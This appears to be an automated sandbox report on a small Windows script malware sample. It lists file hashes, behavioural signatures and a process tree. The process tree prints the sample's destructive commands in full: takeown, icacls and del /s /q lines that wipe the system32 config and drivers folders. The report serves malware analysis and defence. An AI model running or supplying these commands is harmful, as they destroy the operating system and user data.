Analysis
-
max time kernel
139s -
max time network
133s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
15-08-2024 21:31
Static task
static1
Behavioral task
behavioral1
Sample
file.wsf
Resource
win7-20240708-en
General
-
Target
file.wsf
-
Size
2KB
-
MD5
b39eb8682deec9c7a7edcb64512655b0
-
SHA1
d412384d9cfd8ec2333146eb1dd6c137543dabc7
-
SHA256
9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27
-
SHA512
539eaf53ac7f79416519742ba365d0e5d4c8ebc78ba59d8cf5b6f677e7f35fe99d42c3802245d7c5a68e7377d9b88a528fa495fc5b45a01f467fa5705a4af625
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 4260 takeown.exe 3976 takeown.exe 2168 icacls.exe 4840 icacls.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation WScript.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exeicacls.exetakeown.exetakeown.exepid process 2168 icacls.exe 4840 icacls.exe 4260 takeown.exe 3976 takeown.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 3976 takeown.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
cmd.exeWScript.execmd.execmd.exedescription pid process target process PID 2284 wrote to memory of 440 2284 cmd.exe WScript.exe PID 2284 wrote to memory of 440 2284 cmd.exe WScript.exe PID 440 wrote to memory of 1204 440 WScript.exe cmd.exe PID 440 wrote to memory of 1204 440 WScript.exe cmd.exe PID 440 wrote to memory of 1448 440 WScript.exe cmd.exe PID 440 wrote to memory of 1448 440 WScript.exe cmd.exe PID 1448 wrote to memory of 3976 1448 cmd.exe takeown.exe PID 1448 wrote to memory of 3976 1448 cmd.exe takeown.exe PID 1204 wrote to memory of 4260 1204 cmd.exe takeown.exe PID 1204 wrote to memory of 4260 1204 cmd.exe takeown.exe PID 1204 wrote to memory of 2168 1204 cmd.exe icacls.exe PID 1204 wrote to memory of 2168 1204 cmd.exe icacls.exe PID 1448 wrote to memory of 4840 1448 cmd.exe icacls.exe PID 1448 wrote to memory of 4840 1448 cmd.exe icacls.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4260
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3976
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4840
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5b39eb8682deec9c7a7edcb64512655b0
SHA1d412384d9cfd8ec2333146eb1dd6c137543dabc7
SHA2569f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27
SHA512539eaf53ac7f79416519742ba365d0e5d4c8ebc78ba59d8cf5b6f677e7f35fe99d42c3802245d7c5a68e7377d9b88a528fa495fc5b45a01f467fa5705a4af625
-
Filesize
98B
MD54b91264568ac2162700be36338c095e8
SHA1c95726edf8303e6adabcb12ffdca90b51349990a
SHA2562c8545e54e8fbc28791314d7327886237c66b70640d069f276a35b6c3322c037
SHA512e57319453e5da3407ccc77cb3ee6200592e1916932cae467bbf77722f3ff49e5853b4b4d2eeb3092dbb2e22346f56617cc785744771bb3648bf4561feb0e9e1b